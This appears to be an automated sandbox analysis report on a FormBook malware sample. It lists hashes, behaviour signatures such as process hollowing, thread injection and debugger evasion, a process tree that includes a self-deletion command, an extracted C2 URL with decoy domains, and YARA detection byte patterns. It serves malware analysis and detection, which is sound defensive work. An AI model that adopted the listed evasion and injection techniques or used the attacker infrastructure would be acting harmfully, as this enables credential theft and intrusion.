
Analysis Report PO45937008ADENGY.exe

Overview

General Information

Sample Name: PO45937008ADENGY.exe
Analysis ID: 383974
MD5: 47ebf3893d8d6db4add1b87ad75495e4
SHA1: a90970359da16dfbcf89648f7a38fb75707181b3
SHA256: ee54b187c42f159bfba469c4b8c5ba0a85afeb802ea7eacaf400ccb38f7183af
Tags: exe, Formbook
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Startup

  • System is w10x64
  • PO45937008ADENGY.exe (PID: 7024 cmdline: 'C:\Users\user\Desktop\PO45937008ADENGY.exe' MD5: 47EBF3893D8D6DB4ADD1B87AD75495E4)
    • cmd.exe (PID: 3684 cmdline: 'C:\Windows\System32\cmd.exe' /c timeout 1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 1284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • timeout.exe (PID: 1320 cmdline: timeout 1 MD5: 121A4EDAE60A7AF6F5DFA82F7BB95659)
    • PO45937008ADENGY.exe (PID: 6448 cmdline: C:\Users\user\Desktop\PO45937008ADENGY.exe MD5: 47EBF3893D8D6DB4ADD1B87AD75495E4)
    • PO45937008ADENGY.exe (PID: 612 cmdline: C:\Users\user\Desktop\PO45937008ADENGY.exe MD5: 47EBF3893D8D6DB4ADD1B87AD75495E4)
    • PO45937008ADENGY.exe (PID: 6644 cmdline: C:\Users\user\Desktop\PO45937008ADENGY.exe MD5: 47EBF3893D8D6DB4ADD1B87AD75495E4)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 6316 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 5900 cmdline: /c del 'C:\Users\user\Desktop\PO45937008ADENGY.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 4676 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • WerFault.exe (PID: 1668 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7024 -s 2152 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.hnchotels.com/mb7q/"], "decoy": ["thezensub.com", "wapedir.com", "itt.xyz", "mindframediscovery.com", "sitesolved.net", "beyju.store", "belatopapparel.xyz", "ridgefitct.com", "huanb.com", "brustwarzentattoo.com", "jlasoluciones.club", "sinoagrifcf.com", "theskineditco.com", "ccsdinstructer.com", "wealththinker.com", "pradnyanamaya.com", "szmsbk.com", "meezingo.com", "ivyshermanboutique.com", "tkbeads.com", "network70.com", "viralofilia.com", "eversteve.com", "softballlyfe.com", "fashionpulos.com", "myfashionest.com", "thelandcle.com", "xuuxacademy.com", "shopbijousecrets.com", "ynlklwsx.icu", "mtasa.blue", "covid19officers.com", "bookitstaugustine.com", "kuppers.info", "therapeuticsmile.com", "bestsocialprograms.com", "alergiaalfrio.com", "hepimizdostuz.com", "shubharambh-gifts.com", "drmellilo.com", "visaad.com", "caseysisters.com", "accessibleageing.com", "tokoryan.online", "databasement.net", "penstockdistillery.com", "payelll.com", "rockinghampress.com", "tuyensinhhaiphong.com", "myrecordsinfo.com", "thegarnetts.vegas", "veganktichen.com", "helpmewithmyenergy.com", "tootywooty.com", "walmartadvisors.com", "atrangii.com", "sceantez.com", "namigwe.art", "davidkellywvhouse6.com", "richardyg.com", "pasouth.com", "theblockparq.com", "merkuryindustries.com", "solidgroundsministries.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author
00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x166b9:$sqlite3step: 68 34 1C 7B E1
  • 0x167cc:$sqlite3step: 68 34 1C 7B E1
  • 0x166e8:$sqlite3text: 68 38 2A 90 C5
  • 0x1680d:$sqlite3text: 68 38 2A 90 C5
  • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(16 entries in this group; not all are shown)

Unpacked PEs

Source | Rule | Description | Author
9.2.PO45937008ADENGY.exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
9.2.PO45937008ADENGY.exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
9.2.PO45937008ADENGY.exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x158b9:$sqlite3step: 68 34 1C 7B E1
  • 0x159cc:$sqlite3step: 68 34 1C 7B E1
  • 0x158e8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
  • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
9.2.PO45937008ADENGY.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
9.2.PO45937008ADENGY.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 entry in this group; not all matches are shown)

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Found malware configuration
Source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp Malware Configuration Extractor: FormBook (same C2 list and decoy domains as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: PO45937008ADENGY.exe Virustotal: Detection: 27%
Source: PO45937008ADENGY.exe ReversingLabs: Detection: 25%
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.716278315.0000000001630000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914756142.0000000003480000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.712916248.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914080397.0000000002ED0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000011.00000002.914486268.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.715335119.00000000041BE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.714806993.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.PO45937008ADENGY.exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: PO45937008ADENGY.exe Joe Sandbox ML: detected
Source: 9.2.PO45937008ADENGY.exe.400000.0.unpack Avira: Label: TR/Crypt.XPACK.Gen2
Source: unknown HTTPS traffic detected: 104.21.56.119:443 -> 192.168.2.4:49727 version: TLS 1.0
Source: PO45937008ADENGY.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: onfiguration.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: Microsoft.VisualBasic.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.670335958.0000000004C32000.00000004.00000001.sdmp
Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: onfiguration.ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: PO45937008ADENGY.exe, WerFault.exe, 0000000D.00000003.670367883.0000000000C45000.00000004.00000001.sdmp, wlanext.exe
Source: Binary string: crypt32.pdb_ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: clr.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: .ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: PO45937008ADENGY.PDB source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.671537664.0000000000C57000.00000004.00000001.sdmp
Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: WLDP.pdb/ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.pdb< source: WER15F6.tmp.dmp.13.dr
Source: Binary string: System.Xml.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: rasapi32.pdb| source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: indows.Forms.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: System.Core.pdb( source: WER15F6.tmp.dmp.13.dr
Source: Binary string: CLBCatQ.pdb= source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000D.00000003.688645391.0000000005190000.00000004.00000040.sdmp
Source: Binary string: iphlpapi.pdbu source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbn source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscorsecimpl.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wmswsock.pdb! source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: shell32.pdbn source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000C.00000000.688286322.0000000005A00000.00000002.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdbP source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: nsi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdbUGP source: PO45937008ADENGY.exe, 00000009.00000003.664621972.0000000001160000.00000004.00000001.sdmp, wlanext.exe, 00000011.00000002.915414593.0000000003A1F000.00000040.00000001.sdmp
Source: Binary string: ncrypt.pdbk source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: msvcr120_clr0400.i386.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
Source: Binary string: System.Configuration.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: ole32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdbps; source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: imagehlp.pdby source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: ucrtbase.pdb_ source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: propsys.pdbm source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: comctl32v582.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000000D.00000003.688295869.0000000005001000.00000004.00000001.sdmp
Source: Binary string: iVisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000D.00000003.670642715.0000000000C51000.00000004.00000001.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER15F6.tmp.dmp.13.dr
Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: secur32.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: rasman.pdbv source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.688645391.0000000005190000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER15F6.tmp.dmp.13.dr
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: ml.ni.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: .pdb= source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER15F6.tmp.dmp.13.dr
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb7 source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: rsaenh.pdbz source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: ml.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: Kernel.Appcore.pdb! source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc6.pdbQ source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wlanext.pdb source: PO45937008ADENGY.exe, 00000009.00000002.716498017.0000000002F80000.00000040.00000001.sdmp
Source: Binary string: t.VisualBasic.pdb source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: wUxTheme.pdbs source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: shcore.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: .pdb+ source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: cldapi.pdbC source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb" source: WerFault.exe, 0000000D.00000003.688423460.0000000005003000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.725294550.00000000065A0000.00000004.00000001.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb; source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: edputil.pdbI source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: rasapi32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: Microsoft.VisualBasic.pdb\F1 source: WER15F6.tmp.dmp.13.dr
Source: Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: PO45937008ADENGY.exe, 00000000.00000002.708916421.0000000000EF9000.00000004.00000010.sdmp
Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbT source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: diasymreader.pdb source: WerFault.exe, 0000000D.00000003.688216819.00000000051AD000.00000004.00000040.sdmp
Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: Windows.StateRepositoryPS.pdb source: WerFault.exe, 0000000D.00000003.688216819.00000000051AD000.00000004.00000040.sdmp
Source: Binary string: mscorlib.ni.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wgdi32full.pdb` source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: clrjit.pdbR source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.ni.pdbT3 source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: rtutils.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: System.pdbx source: WerFault.exe, 0000000D.00000002.708519326.00000000052A0000.00000004.00000001.sdmp
Source: Binary string: Windows.Storage.pdb% source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000D.00000003.670367883.0000000000C45000.00000004.00000001.sdmp
Source: Binary string: dhcpcsvc6.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
Source: Binary string: profapi.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp, WER15F6.tmp.dmp.13.dr
Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.688228512.0000000005198000.00000004.00000040.sdmp
Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000D.00000003.688167367.000000000519E000.00000004.00000040.sdmp
